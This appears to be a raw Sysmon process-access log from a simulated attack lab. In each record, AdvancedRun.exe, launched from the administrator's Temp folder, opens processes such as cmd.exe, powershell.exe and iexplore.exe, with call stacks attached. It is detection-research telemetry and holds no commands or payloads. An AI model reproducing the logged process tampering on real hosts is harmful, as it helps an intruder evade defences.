20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.211{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.210{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.209{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.209{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.209{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 